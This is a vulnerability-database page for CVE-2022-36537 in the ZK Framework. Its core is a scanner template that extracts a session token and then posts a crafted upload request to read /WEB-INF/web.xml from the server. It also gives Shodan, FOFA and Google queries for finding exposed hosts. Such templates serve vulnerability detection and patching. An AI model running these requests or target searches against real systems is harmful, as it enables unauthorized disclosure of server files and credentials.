| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| Exploit for CVE-2022-36537 | 9 Dec 202211:29 | – | githubexploit | |
| Exploit for CVE-2022-36537 | 9 Dec 202214:15 | – | githubexploit | |
| Exploit for CVE-2022-36537 | 9 Dec 202211:29 | – | githubexploit | |
| Exploit for Improper Handling of Exceptional Conditions in Google Chrome | 25 Oct 202212:02 | – | githubexploit | |
| Exploit for CVE-2022-36537 | 28 Sep 202501:11 | – | githubexploit | |
| CVE-2022-36537 | 26 Aug 202200:00 | – | attackerkb | |
| The vulnerability of the AuUploader component in the ZK Framework, a web application development framework, allows a malicious actor to gain unauthorized access to protected information. | 22 Mar 202300:00 | – | bdu_fstec | |
| CVE-2022-36537 | 27 Aug 202200:30 | – | circl | |
| ZK Framework AuUploader Unspecified Vulnerability | 27 Feb 202300:00 | – | cisa_kev | |
| ZK 安全漏洞 | 26 Aug 202200:00 | – | cnnvd |
id: CVE-2022-36537
info:
name: ZK Framework - Information Disclosure
author: theamanrawat
severity: high
description: |
ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
impact: |
The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.
remediation: |
Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
reference:
- https://github.com/Malwareman007/CVE-2022-36537/
- https://tracker.zkoss.org/browse/ZK-5150
- https://nvd.nist.gov/vuln/detail/CVE-2022-36537
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-36537
cwe-id: CWE-200
epss-score: 0.95335
epss-percentile: 0.99856
cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zkoss
product: zk_framework
shodan-query:
- http.title:"Server backup manager"
- http.title:"server backup manager"
fofa-query: title="server backup manager"
google-query: intitle:"server backup manager"
tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss,vkev,vuln
http:
- raw:
- |
GET /login.zul HTTP/1.1
Host: {{Hostname}}
- |
POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Length: 154
------WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Disposition: form-data; name="nextURI"
/WEB-INF/web.xml
------WebKitFormBoundaryCs6yB0zvpfSBbYEp--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- <display-name>.*</display-name>
- |-
<welcome-file-list>((.|
)*)welcome-file-list>
- xml version
- web-app
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: dtid
group: 1
regex:
- "dt:'(.*?)',cu:"
internal: true
# digest: 4b0a00483046022100d4ee95b72df175eb8cbd01ecdd2de02507a9781edc9f0d062a2d357841a93efe022100b3b4ea2211934e17accfa9adfae65b52ba99b2f8ea821ab0e38b3534aec5f6c3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation